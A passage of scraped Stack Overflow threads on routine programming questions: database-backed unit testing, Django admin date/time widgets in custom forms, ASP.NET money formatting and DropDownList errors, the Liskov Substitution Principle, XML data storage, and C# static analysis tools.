In the past I've tried inserting the test data in a test database, then running the test, but honestly it's pretty painful to write this kind of code (and error prone). I've also tried just building a test database up front and rolling back the changes. That works OK but in a number of places you can't easily do this either (and many people would say that's integration testing; so be it, I still need to be able to test this somehow).
If the answer is that there isn't a nice way of handling this and it currently just sort of sucks, that would be useful to know as well.
Any thoughts, ideas, suggestions, or tips are appreciated.
A: My automated functional tests usually follow one of two patterns:
*
*Database Connected Tests
*Mock Persistence Layer Tests
Database Connected Tests
When I have automated tests that are connected to the database, I usually make a single test database template that has enough data for all the tests. When the automated tests are run, a new test database is generated from the template for every test. The test database has to be constantly re-generated because tests will often change the data. As tests are added, I usually append more data to the test database template.
There are some nice advantages to this testing method. The obvious advantage is that the tests also exercise your schema. Another advantage is that after setting up the initial tests, most new tests will be able to re-use the existing test data. This makes it easy to add more tests.
The downside is that the test database will become unwieldy. Because data will usually be added one test at time, it will be inconsistent and maybe even unrealistic. You will also end up cursing the person who setup the test database when there is a significant database schema change (which for me usually means I end up cursing myself).
This style of testing obviously doesn't work if you can't generate new test databases at will.
Mock Persistence Layer Tests
For this pattern, you create mock objects that live with the test cases. These mock objects intercept the calls to the database so that you can programmatically provide the appropriate results. Basically, when the code you're testing calls the findCustomerByName() method, your mock object is called instead of the persistence layer.
The nice thing about using mock object tests is that you can get very specific. Often times, there are execution paths that you simply can't reach in automated tests w/o mock objects. They also free you from maintaining a large, monolithic set of test data.
Another benefit is the lack of external dependencies. Because the mock objects simulate the persistence layer, your tests are no longer dependent on the database. This is often the deciding factor when choosing which pattern to choose. Mock objects seem to get more traction when dealing with legacy database systems or databases with stringent licensing terms.
The downside of mock objects is that they often result in a lot of extra test code. This isn't horrible because almost any amount of testing code is cheap when amortized over the number of times you run the test, but it can be annoying to have more test code than production code.
A: It depends on what you're testing. If you're testing a business logic component -- then it's immaterial where the data is coming from and you'd probably use a mock or a hand rolled stub class that simulates the data access routine the component would have called in the wild. The only time I mess with the data access is when I'm actually testing the data access components themselves.
Even then I tend to open a DB transaction in the TestFixtureSetUp method (obviously this depends on what unit testing framework you might be using) and rollback the transaction at the end of the test suite TestFixtureTeardown.
A: Mocking Frameworks enable you to test your business objects.
Data-driven tests often end up becoming more of an integration test than a unit test; they also carry the burden of managing the state of a data store before and after execution of the test, plus the time taken in connecting and executing queries.
In general I would avoid doing unit tests that touch the database from your business objects. As for testing your database, you need a different strategy.
That being said, you can never totally get away from data-driven testing, only limit the amount of tests that actually need to invoke your back-end systems.
A: I have to second the comment by @Phil Bennett as I try to approach these integration tests with a rollback solution.
I have a very detailed post about integration testing your data access layer here
I show not only the sample data access class, base class, and sample DB transaction fixture class, but a full CRUD integration test w/ sample data shown. With this approach you don't need multiple test databases, as you can control the data going in with each test, and after the test is complete the transactions are all rolled back so your DB is clean.
About unit testing business logic inside your app, I would also second the comments by @Phil and @Mark because if you mock out all the dependencies your business object has, it becomes very simple to test your application logic one entity at a time ;)
Edit: So are you looking for one huge integration test that will verify everything from logic pre-data base / stored procedure run w/ logic and finally a verification on the way back? If so you could break this out into 2 steps:
*
*1 - Unit test the logic that happens before the data is pushed into your data access code. For example, if you have some code that calculates some numbers based on some properties -- write a test that only checks to see if the logic for this one function does what you asked it to do. Mock out any dependency on the data access class so you can ignore it for this test of the application logic alone.
*2 - Integration test the logic that happens once you take your manipulated data (from the previous method we unit tested) and call the appropriate stored procedure. Do this inside a data-specific testing class so you can roll back after it's completed. After your stored procedure has run, do a query against the database to get your object, now that we have done some logic against the data, and verify it has the values you expected (post-stored procedure logic, etc.).
If you need an entry in your database for the stored procedure to run, simply insert that data before you run the sproc that has your logic inside it. For example, if you have a product that you need to test, it might require a supplier and category entry to insert so before you insert your product do a quick and dirty insert for a supplier and category so your product insert works as planned.
A: It sounds like you might be testing message based systems, or systems with highly parameterised interfaces, where there are large numbers of permutations of input data.
In general all the rules of standard unit testing still hold:
*
*Try to make the units being tested as small and discrete as possible.
*Try to make tests independent.
*Factor code to decouple dependencies.
*Use mocks and stubs to replace dependencies (like dataaccess)
Once this is done you will have removed a lot of the complexity from the tests, hopefully revealing good sets of unit tests, and simplifying the sample data.
A good methodology for compiling sample data for tests that still require complex input data is orthogonal testing, or see here.
I've used that sort of method for generating test plans for WCF and BizTalk solutions where the permutations of input messages can create multiple possible execution paths.
A: For lots of different runs over the same logic but with different data you can use CSV, as many columns as you like for the input and the last for the output etc.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38598",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: Using Django time/date widgets in custom form How can I use the nifty JavaScript date and time widgets that the default admin uses with my custom view?
I have looked through the Django forms documentation, and it briefly mentions django.contrib.admin.widgets, but I don't know how to use it?
Here is my template that I want it applied on.
<form action="." method="POST">
<table>
{% for f in form %}
<tr> <td> {{ f.name }}</td> <td>{{ f }}</td> </tr>
{% endfor %}
</table>
<input type="submit" name="submit" value="Add Product">
</form>
Also, I think it should be noted that I haven't really written a view up myself for this form, I am using a generic view. Here is the entry from the url.py:
(r'^admin/products/add/$', create_object, {'model': Product, 'post_save_redirect': ''}),
And I am relatively new to the whole Django/MVC/MTV thing, so please go easy...
A: Complementing the answer by Carl Meyer, I would like to comment that you need to put that header in some valid block (inside the head) within your template.
{% block extra_head %}
<link rel="stylesheet" type="text/css" href="/media/admin/css/forms.css"/>
<link rel="stylesheet" type="text/css" href="/media/admin/css/base.css"/>
<link rel="stylesheet" type="text/css" href="/media/admin/css/global.css"/>
<link rel="stylesheet" type="text/css" href="/media/admin/css/widgets.css"/>
<script type="text/javascript" src="/admin/jsi18n/"></script>
<script type="text/javascript" src="/media/admin/js/core.js"></script>
<script type="text/javascript" src="/media/admin/js/admin/RelatedObjectLookups.js"></script>
{{ form.media }}
{% endblock %}
A: For Django >= 2.0
Note: Using admin widgets for date-time fields is not a good idea as admin style-sheets can conflict with your site style-sheets in case you are using bootstrap or any other CSS frameworks. If you are building your site on bootstrap use my bootstrap-datepicker widget django-bootstrap-datepicker-plus.
Step 1: Add javascript-catalog URL to your project's (not app's) urls.py file.
from django.views.i18n import JavaScriptCatalog
urlpatterns = [
path('jsi18n', JavaScriptCatalog.as_view(), name='javascript-catalog'),
]
Step 2: Add required JavaScript/CSS resources to your template.
<script type="text/javascript" src="{% url 'javascript-catalog' %}"></script>
<script type="text/javascript" src="{% static '/admin/js/core.js' %}"></script>
<link rel="stylesheet" type="text/css" href="{% static '/admin/css/widgets.css' %}">
<style>.calendar>table>caption{caption-side:unset}</style><!--caption fix for bootstrap4-->
{{ form.media }} {# Form required JS and CSS #}
Step 3: Use admin widgets for date-time input fields in your forms.py.
from django.contrib.admin import widgets
from .models import Product
class ProductCreateForm(forms.ModelForm):
class Meta:
model = Product
fields = ['name', 'publish_date', 'publish_time', 'publish_datetime']
widgets = {
'publish_date': widgets.AdminDateWidget,
'publish_time': widgets.AdminTimeWidget,
'publish_datetime': widgets.AdminSplitDateTime,
}
A: As the solution is hackish, I think using your own date/time widget with some JavaScript is more feasible.
A: The below will also work as a last resort if the above failed
class PaymentsForm(forms.ModelForm):
class Meta:
model = Payments
def __init__(self, *args, **kwargs):
super(PaymentsForm, self).__init__(*args, **kwargs)
self.fields['date'].widget = SelectDateWidget()
Same as
class PaymentsForm(forms.ModelForm):
date = forms.DateField(widget=SelectDateWidget())
class Meta:
model = Payments
Put this in your forms.py: from django.forms.extras.widgets import SelectDateWidget
A: Here's another 2020 solution, inspired by @Sandeep's. Using the MinimalSplitDateTimeMultiWidget found in this gist, in our Form as below, we can use modern browser date and time selectors (via eg 'type': 'date'). We don't need any JS.
class EditAssessmentBaseForm(forms.ModelForm):
class Meta:
model = Assessment
fields = '__all__'
begin = DateTimeField(widget=MinimalSplitDateTimeMultiWidget())
A: Another simple solution for Django 3 (3.2) in 2021 ;) because andyw's solution doesn't work in Firefox...
{% load static %}
{% block extrahead %}
{{ block.super }}
<script type="text/javascript" src="{% static 'admin/js/cancel.js' %}"></script>
<link rel="stylesheet" type="text/css" href="{% static 'admin/css/forms.css' %}">
<script src="{% url 'admin:jsi18n' %}"></script>
<script src="{% static 'admin/js/jquery.init.js' %}"></script>
<script src="{% static 'admin/js/core.js' %}"></script>
{{ form.media }}
{% endblock %}
<form action="" method="post">
{% csrf_token %}
{{ form.as_p }}
<input type="submit" value="Сохранить">
</form>
and you'll be able to use your form.
example:
from django.contrib.admin import widgets
date_time = forms.SplitDateTimeField(widget=widgets.AdminSplitDateTime)
A: What about just assigning a class to your widget and then binding that class to the JQuery datepicker?
Django forms.py:
class MyForm(forms.ModelForm):
class Meta:
model = MyModel
def __init__(self, *args, **kwargs):
super(MyForm, self).__init__(*args, **kwargs)
self.fields['my_date_field'].widget.attrs['class'] = 'datepicker'
And some JavaScript for the template:
$(".datepicker").datepicker();
A: The growing complexity of this answer over time, and the many hacks required, probably ought to caution you against doing this at all. It's relying on undocumented internal implementation details of the admin, is likely to break again in future versions of Django, and is no easier to implement than just finding another JS calendar widget and using that.
That said, here's what you have to do if you're determined to make this work:
*
*Define your own ModelForm subclass for your model (best to put it in forms.py in your app), and tell it to use the AdminDateWidget / AdminTimeWidget / AdminSplitDateTime (replace 'mydate' etc with the proper field names from your model):
from django import forms
from my_app.models import Product
from django.contrib.admin import widgets
class ProductForm(forms.ModelForm):
class Meta:
model = Product
def __init__(self, *args, **kwargs):
super(ProductForm, self).__init__(*args, **kwargs)
self.fields['mydate'].widget = widgets.AdminDateWidget()
self.fields['mytime'].widget = widgets.AdminTimeWidget()
self.fields['mydatetime'].widget = widgets.AdminSplitDateTime()
*Change your URLconf to pass 'form_class': ProductForm instead of 'model': Product to the generic create_object view (that'll mean from my_app.forms import ProductForm instead of from my_app.models import Product, of course).
*In the head of your template, include {{ form.media }} to output the links to the Javascript files.
*And the hacky part: the admin date/time widgets presume that the i18n JS stuff has been loaded, and also require core.js, but don't provide either one automatically. So in your template above {{ form.media }} you'll need:
<script type="text/javascript" src="/my_admin/jsi18n/"></script>
<script type="text/javascript" src="/media/admin/js/core.js"></script>
You may also wish to use the following admin CSS (thanks Alex for mentioning this):
<link rel="stylesheet" type="text/css" href="/media/admin/css/forms.css"/>
<link rel="stylesheet" type="text/css" href="/media/admin/css/base.css"/>
<link rel="stylesheet" type="text/css" href="/media/admin/css/global.css"/>
<link rel="stylesheet" type="text/css" href="/media/admin/css/widgets.css"/>
This implies that Django's admin media (ADMIN_MEDIA_PREFIX) is at /media/admin/ - you can change that for your setup. Ideally you'd use a context processor to pass this values to your template instead of hardcoding it, but that's beyond the scope of this question.
This also requires that the URL /my_admin/jsi18n/ be manually wired up to the django.views.i18n.javascript_catalog view (or null_javascript_catalog if you aren't using I18N). You have to do this yourself instead of going through the admin application so it's accessible regardless of whether you're logged into the admin (thanks Jeremy for pointing this out). Sample code for your URLconf:
(r'^my_admin/jsi18n', 'django.views.i18n.javascript_catalog'),
Lastly, if you are using Django 1.2 or later, you need some additional code in your template to help the widgets find their media:
{% load adminmedia %} /* At the top of the template. */
/* In the head section of the template. */
<script type="text/javascript">
window.__admin_media_prefix__ = "{% filter escapejs %}{% admin_media_prefix %}{% endfilter %}";
</script>
Thanks lupefiasco for this addition.
A: I find myself referencing this post a lot, and found that the documentation defines a slightly less hacky way to override default widgets.
(No need to override the ModelForm's __init__ method)
However, you still need to wire your JS and CSS appropriately as Carl mentions.
forms.py
from django import forms
from my_app.models import Product
from django.contrib.admin import widgets
class ProductForm(forms.ModelForm):
mydate = forms.DateField(widget=widgets.AdminDateWidget)
mytime = forms.TimeField(widget=widgets.AdminTimeWidget)
mydatetime = forms.SplitDateTimeField(widget=widgets.AdminSplitDateTime)
class Meta:
model = Product
Reference Field Types to find the default form fields.
A: My head code for 1.4 version(some new and some removed)
{% block extrahead %}
<link rel="stylesheet" type="text/css" href="{{ STATIC_URL }}admin/css/forms.css"/>
<link rel="stylesheet" type="text/css" href="{{ STATIC_URL }}admin/css/base.css"/>
<link rel="stylesheet" type="text/css" href="{{ STATIC_URL }}admin/css/global.css"/>
<link rel="stylesheet" type="text/css" href="{{ STATIC_URL }}admin/css/widgets.css"/>
<script type="text/javascript" src="/admin/jsi18n/"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/core.js"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/admin/RelatedObjectLookups.js"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/jquery.js"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/jquery.init.js"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/actions.js"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/calendar.js"></script>
<script type="text/javascript" src="{{ STATIC_URL }}admin/js/admin/DateTimeShortcuts.js"></script>
{% endblock %}
A: Yep, I ended up overriding the /admin/jsi18n/ url.
Here's what I added in my urls.py. Make sure it's above the /admin/ url
(r'^admin/jsi18n', i18n_javascript),
And here is the i18n_javascript function I created.
from django.contrib import admin
def i18n_javascript(request):
return admin.site.i18n_javascript(request)
A: Starting in Django 1.2 RC1, if you're using the Django admin date picker widget trick, the following has to be added to your template, or you'll see the calendar icon url being referenced through "/missing-admin-media-prefix/".
{% load adminmedia %} /* At the top of the template. */
/* In the head section of the template. */
<script type="text/javascript">
window.__admin_media_prefix__ = "{% filter escapejs %}{% admin_media_prefix %}{% endfilter %}";
</script>
A: Updated solution and workaround for SplitDateTime with required=False:
forms.py
from django import forms
class SplitDateTimeJSField(forms.SplitDateTimeField):
def __init__(self, *args, **kwargs):
super(SplitDateTimeJSField, self).__init__(*args, **kwargs)
self.widget.widgets[0].attrs = {'class': 'vDateField'}
self.widget.widgets[1].attrs = {'class': 'vTimeField'}
class AnyFormOrModelForm(forms.Form):
date = forms.DateField(widget=forms.TextInput(attrs={'class':'vDateField'}))
time = forms.TimeField(widget=forms.TextInput(attrs={'class':'vTimeField'}))
timestamp = SplitDateTimeJSField(required=False,)
form.html
<script type="text/javascript" src="/admin/jsi18n/"></script>
<script type="text/javascript" src="/admin_media/js/core.js"></script>
<script type="text/javascript" src="/admin_media/js/calendar.js"></script>
<script type="text/javascript" src="/admin_media/js/admin/DateTimeShortcuts.js"></script>
urls.py
(r'^admin/jsi18n/', 'django.views.i18n.javascript_catalog'),
A: I use this, it's great, but I have 2 problems with the template:
*
*I see the calendar icons twice for every field in the template.
*And for TimeField I have 'Enter a valid date.'
models.py
from django.db import models

class Guide(models.Model):
    name = models.CharField(max_length=100)
    create_date = models.DateField(blank=True)
    start_time = models.TimeField(blank=False)
    end_time = models.TimeField(blank=False)
forms.py
from django import forms
from .models import Guide
from django.contrib.admin import widgets
class GuideForm(forms.ModelForm):
start_time = forms.DateField(widget=widgets.AdminTimeWidget)
end_time = forms.DateField(widget=widgets.AdminTimeWidget)
create_date = forms.DateField(widget=widgets.AdminDateWidget)
class Meta:
model=Guide
fields=['name','categorie','thumb']
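A guess at the cause of problem 2, offered purely as a sketch and not as part of the original post: start_time and end_time above are declared as forms.DateField, so the AdminTimeWidget submits a time string that a DateField cannot parse, which would produce 'Enter a valid date.'. Matching the field types to the widgets would look like this (names copied from the question, the fields list is an assumption):
from django import forms
from django.contrib.admin import widgets
from .models import Guide

class GuideForm(forms.ModelForm):
    # TimeField pairs with AdminTimeWidget, DateField with AdminDateWidget
    start_time = forms.TimeField(widget=widgets.AdminTimeWidget)
    end_time = forms.TimeField(widget=widgets.AdminTimeWidget)
    create_date = forms.DateField(widget=widgets.AdminDateWidget)

    class Meta:
        model = Guide
        fields = ['name', 'create_date', 'start_time', 'end_time']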
A: In Django 1.10.
myproject/urls.py:
at the beginning of urlpatterns
from django.views.i18n import JavaScriptCatalog
urlpatterns = [
url(r'^jsi18n/$', JavaScriptCatalog.as_view(), name='javascript-catalog'),
.
.
.]
In my template.html:
{% load staticfiles %}
<script src="{% static "js/jquery-2.2.3.min.js" %}"></script>
<script src="{% static "js/bootstrap.min.js" %}"></script>
{# Loading internazionalization for js #}
{% load i18n admin_modify %}
<script type="text/javascript" src="{% url 'javascript-catalog' %}"></script>
<script type="text/javascript" src="{% static "/admin/js/jquery.init.js" %}"></script>
<link rel="stylesheet" type="text/css" href="{% static "/admin/css/base.css" %}">
<link rel="stylesheet" type="text/css" href="{% static "/admin/css/forms.css" %}">
<link rel="stylesheet" type="text/css" href="{% static "/admin/css/login.css" %}">
<link rel="stylesheet" type="text/css" href="{% static "/admin/css/widgets.css" %}">
<script type="text/javascript" src="{% static "/admin/js/core.js" %}"></script>
<script type="text/javascript" src="{% static "/admin/js/SelectFilter2.js" %}"></script>
<script type="text/javascript" src="{% static "/admin/js/admin/RelatedObjectLookups.js" %}"></script>
<script type="text/javascript" src="{% static "/admin/js/actions.js" %}"></script>
<script type="text/javascript" src="{% static "/admin/js/calendar.js" %}"></script>
<script type="text/javascript" src="{% static "/admin/js/admin/DateTimeShortcuts.js" %}"></script>
A: My Django Setup : 1.11
Bootstrap: 3.3.7
Since none of the answers are completely clear, I am sharing my template code which presents no errors at all.
Top Half of template:
{% extends 'base.html' %}
{% load static %}
{% load i18n %}
{% block head %}
<title>Add Interview</title>
{% endblock %}
{% block content %}
<script type="text/javascript" src="{% url 'javascript-catalog' %}"></script>
<script type="text/javascript" src="{% static 'admin/js/core.js' %}"></script>
<link rel="stylesheet" type="text/css" href="{% static 'admin/css/forms.css' %}"/>
<link rel="stylesheet" type="text/css" href="{% static 'admin/css/widgets.css' %}"/>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" >
<script type="text/javascript" src="{% static 'js/jquery.js' %}"></script>
Bottom Half:
<script type="text/javascript" src="/admin/jsi18n/"></script>
<script type="text/javascript" src="{% static 'admin/js/vendor/jquery/jquery.min.js' %}"></script>
<script type="text/javascript" src="{% static 'admin/js/jquery.init.js' %}"></script>
<script type="text/javascript" src="{% static 'admin/js/actions.min.js' %}"></script>
{% endblock %}
A: June 3, 2020 (none of the other answers worked for me; you can try this solution I used. Just for TimeField)
Use a simple CharField for the time fields (start and end in this example) in the forms.
forms.py
we can use Form or ModelForm here.
class TimeSlotForm(forms.ModelForm):
start = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'HH:MM'}))
end = forms.CharField(widget=forms.TextInput(attrs={'placeholder': 'HH:MM'}))
class Meta:
model = TimeSlots
fields = ('start', 'end', 'provider')
Convert the string input into a time object in the view.
import datetime

def slots(request):
    if request.method == 'POST':
        form = TimeSlotForm(request.POST)
        if form.is_valid():
            slot = form.save(commit=False)
            start = form.cleaned_data['start']
            end = form.cleaned_data['end']
            start = datetime.datetime.strptime(start, '%H:%M').time()
            end = datetime.datetime.strptime(end, '%H:%M').time()
            slot.start = start
            slot.end = end
            slot.save()
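A closely related variant (my own sketch, not part of the answer): let a TimeField parse the 'HH:MM' strings during validation, so the view never has to call strptime. Model and field names follow the answer; input_formats is a standard forms.TimeField argument.
from django import forms
from .models import TimeSlots

class TimeSlotForm(forms.ModelForm):
    # cleaned_data['start'] and ['end'] arrive as datetime.time objects,
    # so the view can simply call form.save()
    start = forms.TimeField(input_formats=['%H:%M'],
                            widget=forms.TextInput(attrs={'placeholder': 'HH:MM'}))
    end = forms.TimeField(input_formats=['%H:%M'],
                          widget=forms.TextInput(attrs={'placeholder': 'HH:MM'}))

    class Meta:
        model = TimeSlots
        fields = ('start', 'end', 'provider')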
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38601",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "183"
} |
Q: Best way to display/format SQL 2005 money data type in ASP.Net I am attempting to set an asp.net textbox to a SQL 2005 money data type field; the initial result displayed to the user is 40.0000 instead of 40.00.
In my asp.net textbox control I would like to only display the first 2 numbers after the decimal point e.g. 40.00
What would be the best way to do this?
My code is below:
this.txtPayment.Text = dr["Payment"].ToString();
A: this.txtPayment.Text = string.Format("{0:c}", dr["Payment"]);
A: Does the "c" format string work on ASP.NET the same way as it does in, say, Windows Forms? Because in WinForms I'm fairly certain it obeys the client's currency settings. So even if the value is stored in US Dollars, if the client PC is set up to display Yen then that's the currency symbol that'll be displayed. That may not be what you want.
It may be wiser if that's the case to use:
txtPayment.Text = ((decimal)dr["Payment"]).ToString("00.00");
A: Use the ToString method with "c" to format it as currency.
this.txtPayment.Text = ((decimal)dr["Payment"]).ToString("c");
Standard Numeric Format Strings
A: @Matt Hamilton
It does. "c" works for whatever the CurrentCultureInfo is, the question becomes if all the users of the web application have the same currency as the server, otherwise, they will need to get the cultureinfo clientside and use the currency gleaned from there.
A: After some research I came up with the following:
string pmt = dr["Payment"].ToString();
double dblPmt = System.Convert.ToDouble(pmt);
this.txtPayment.Text = dblPmt.ToString("c",CultureInfo.CurrentCulture.NumberFormat);
I am going to test all code samples given. If I can solve this with one line of code then that's what I am going to do.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38602",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: asp:DropDownList Error: 'DropDownList1' has a SelectedValue which is invalid because it does not exist in the list of items I have a asp.net 2.0 web site with numerous asp:DropDownList controls.
The DropDownList control contains the standard info city, state, county etc... info.
In addition to the standard codes the site also has custom codes that the users can configure themselves.
For example an animal dropdown may contain the values Dog, Cat, Fish, etc...
I am populating the DropDownList from a SQL 2005 table that I created e.g. tblCodes
Everything works great and users are able to add orders using the numerous DropDownList controls to choose items from the list.
The problem occurs if a user wants to change one of their custom dropdowns. For example a user would like to change the verbiage
on an animal type control from Dog to K9. This is where the problem starts.
For all new orders the drop down works fine. When the user retrieves an old order
I get the following error in the C# codebehind
"'DropDownList1' has a SelectedValue which is invalid because it does not exist in the list of items."
What's happening is the old order has a database field value of Dog and the DropDownList no longer has Dog in its list since the user changed it to K9.
Any ideas on a workaround?
Is there a way to make the asp:DropDownList accept items not seeded in its list?
Is there another control I could use?
A: I solved this exact same problem just two days ago. First, I moved the code that set the SelectedValue to a PreRender handler for the DropDownList. Then, I add logic to first check to see if the value is in the drop down list. If not, I add it.
Here's my code. ddSpecialty is my drop-down list, populated with "specialties" from the database. registration.Specialty is the specialty that the user chose, which may or may not be in the drop down, since that particular specialty may have been deleted since they last chose it.
protected void ddSpecialty_PreRender(object sender, EventArgs e)
{
if (!ddSpecialty.Items.Contains(new ListItem(registration.Specialty)))
ddSpecialty.Items.Add(registration.Specialty);
ddSpecialty.SelectedValue = registration.Specialty;
}
A: I've become very fond of the following little snippet for setting DropDownList values:
For non-DataBound (eg Items added manually):
ddl.SelectedIndex = ddl.Items.IndexOf(ddl.Items.FindByValue(value));
For DataBound:
ddl.DataBound += (o,e) => ddl.SelectedIndex = ddl.Items.IndexOf(ddl.Items.FindByValue(value));
I sure do wish though that ListControls in general didn't throw errors when you try to set values to something that isn't there. At least in Release mode anyways it would have been nice for this to just quietly die.
A: Your SelectedValue should be a unique id of some sort, that doesn't change. The Text value that gets displayed to the user is something seperate, and can change if necessary without affecting your application, because you associate the id with your Order, not the displayed string value.
A: I'm not sure it's the same issue, but I had a similar sounding issue with trying to bind a DropDownList that I wanted to contain in a GridView. When I looked around I found a lot of people asking similar questions, but no robust solutions. I did read conflicting reports about whether you could intercept databinding, etc. events. I tried most of them but I couldn't find a way of intercepting or pre-empting the error.
I ended up creating a subclass of the ddl, intercepting the error from there and hacking a fix.
Not tidy but it worked for my needs. I put the code up on my blog in case it's of help. link text
A: Check this:
http://www.codeproject.com/Tips/179184/ASP-dropdownlist-missing-value-error.aspx
A: Try this:
if (ddl.Items.Contains(new ListItem(selectedFacility)))
ddl.SelectedValue = selectedFacility;
A: Ran into this myself. Oddly, ddl.ClearSelection(); didn't work. Had to use ddl.SelectedValue = null
Also noticed, that this must come AFTER I clear the items from the list ddl.Items.Clear(); which also seems weird. Setting the SelectedValue to null, then clearing the items still threw the error.
Once this is done, re-bind the list and re-select with new value.
A: I have made a workaround after having this problem very often. It is unfortunate that MS still has not fixed this issue.
Anyway, my workaround is as follows.
1) I bind the data to the ToolTip property of the DropDownList
<asp:DropDownList ID="edtDepartureIDKey" runat="server" CssClass="textbox"
ToolTip='<%# Eval("DepartureIDKey") %>' DataSource="<%# DLL1DataSource() %>" DataTextField="DisplayField" DataValueField="IDKey"
onprerender="edtDepartureIDKey_PreRender">
2) On the prerender event I check the availability of the data, and if it is not in the list I simply add it, then set the selected index to the data value which I saved in the ToolTip property
protected void edtDepartureIDKey_PreRender(object sender, EventArgs e)
{
DropDownList ddl = (sender as DropDownList);
if (ddl.Items.FindByValue(ddl.ToolTip) == null)
{
//I am pulling Departure Data through the ID which is saved in ToolTip, and insert it into the 1st row of the DropDownList
TODepartureData v = new TODepartureData(DBSERVER.ConnStrName);
TODeparture d = v.Select(Convert.ToInt32(ddl.ToolTip));
ddl.Items.Insert(0, new ListItem(d.DeptCode, ddl.ToolTip));
}
ddl.Items.FindByValue(ddl.ToolTip).Selected = true;
}
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38612",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2"
} |
Q: LSP in OO programming? Am I right in thinking the full name of the LSP is the Liskoff Substitution Principle? I'm having trouble finding an [online] source to cite for any information on this... it seems to be a cornerstone of OOP, and yet I'm having trouble finding definitions.
A: Yes, you are right. It's spelled Liskov which is probably why you can't find a citation.
Here's the link. One of the better resources regarding this is Robert C. Martin's Agile Software Development: Principles, Patterns, and Practices book.
A: You got the name right.
http://en.wikipedia.org/wiki/Liskov_substitution_principle
It was developed by Barbara Liskov, a professor at MIT.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38618",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: ASP.NET XML ObjectDataSource Wrapper Class Examples I want to use XML instead of SQLServer for a simple website.
Are there any good tutorials, code examples, and/or tools available to make a (prefer VB.NET) wrapper class to handle the basic list, insert, edit, and delete (CRUD) code?
The closest one I found was on a Telerik Trainer video/code for their Scheduler component where they used XML to handle the scheduling data in the demo. They created an ObjectDataSource class. Here is a LINK to that demo if anyone is interested.
[Reply to Esteban]
It would make deployment easier for clients that use godaddy where the database isn't in the app_data folder. Also, backing up those websites would be as simple as FTPing the entire thing.
I have concerns about possible collisions on saving, especially if I add something as simple as a click counter to, say, a list of mp3 files visitors to the site can access.
A: In these days of SQL Server Express, I'd say there's really no reason for you not to use a database.
I know this doesn't really answer your question, but I'd hate to see you roll out code that will be a nightmare to maintain and scale.
Maybe you could tell us why you want to use XML files instead of a proper database.
A: It would make deployment easier for clients that use go-daddy where the database isn't in the app_data folder. Also, backing up those websites would be as simple as FTPing the entire thing.
I have concerns about possible collisions on saving, especially if I add something as simple as a click counter to, say, a list of mp3 files visitors to the site can access.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/38629",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "0"
} |
Q: What static analysis tools are available for C#? What tools are available for static analysis of C# code? I know about FxCop and StyleCop. Are there others? I've run across NStatic before but it's been in development for what seems like forever - it's looking pretty slick from what little I've seen of it, so it would be nice if it would ever see the light of day.
Along these same lines (this is primarily my interest for static analysis), tools for testing code for multithreading issues (deadlocks, race conditions, etc.) also seem a bit scarce. Typemock Racer just popped up so I'll be looking at that. Anything beyond this?
Real-life opinions about tools you've used are appreciated.
A: The tool NDepend is quoted as Quality Metric Tools but it is pretty much also a Code violation detection tool. Disclaimer: I am one of the developers of the tool
With NDepend, one can write Code Rules over LINQ Queries (what we call CQLinq). More than 200 CQLinq code rules are proposed by default. The strength of CQLinq is that it is straightforward to write a code rule and get immediate results. Facilities are proposed to browse matched code elements. For example:
Besides that, NDepend comes with many other static-analysis-related features. These include:
*
*Reporting from your CI/CD
*Azure DevOps Hub
*GitHub Action
*Smart Technical Debt Estimation
*Dependency Matrix
*Code Diff capabilities
*NDepend.API that lets you write your own static analysis tool. With NDepend.API we even developed a tool to detect code duplicates (details in this blog post: An Original Algorithm to Find .NET Code Duplicate).
*Powerful Dependency Graph
A: Code violation detection Tools:
*
*FxCop, excellent tool by Microsoft. Check compliance with .NET framework guidelines.
Edit October 2010: No longer available as a standalone download. It is now included in the Windows SDK and after installation can be found in Program Files\Microsoft SDKs\Windows\[v7.1]\Bin\FXCop\FxCopSetup.exe
Edit February 2018: This functionality has now been integrated into Visual Studio 2012 and later as Code Analysis
*Clocksharp, based on code source analysis (to C# 2.0)
*Mono.Gendarme, similar to FxCop but with an open source licence (based on Mono.Cecil)
*Smokey, similar to FxCop and Gendarme, based on Mono.Cecil. No longer on development, the main developer works with Gendarme team now.
*Coverity Prevent™ for C#, commercial product
*PRQA QA·C#, commercial product
*PVS-Studio, commercial product
*CAT.NET, visual studio addin that helps identification of security flaws Edit November 2019: Link is dead.
*CodeIt.Right
*Spec#
*Pex
*SonarQube, FOSS & Commercial options to support writing cleaner and safer code.
Quality Metric Tools:
*
*NDepend, great visual tool. Useful for code metrics, rules, diff, coupling and dependency studies.
*Nitriq, free, can easily write your own metrics/constraints, nice visualizations. Edit February 2018: download links now dead. Edit June 17, 2019: Links not dead.
*RSM Squared, based on code source analysis
*C# Metrics, using a full parse of C#
*SourceMonitor, an old tool that occasionally gets updates
*Code Metrics, a Reflector add-in
*Vil, old tool that doesn't support .NET 2.0. Edit January 2018: Link now dead
Checking Style Tools:
*
*StyleCop, Microsoft tool ( run from inside of Visual Studio or integrated into an MSBuild project). Also available as an extension for Visual Studio 2015 and C#6.0
*Agent Smith, code style validation plugin for ReSharper
Duplication Detection:
*
*Simian, based on source code. Works with plenty languages.
*CloneDR, detects parameterized clones only on language boundaries (also handles many languages other than C#)
*Clone Detective a Visual Studio plugin (which uses ConQAT internally)
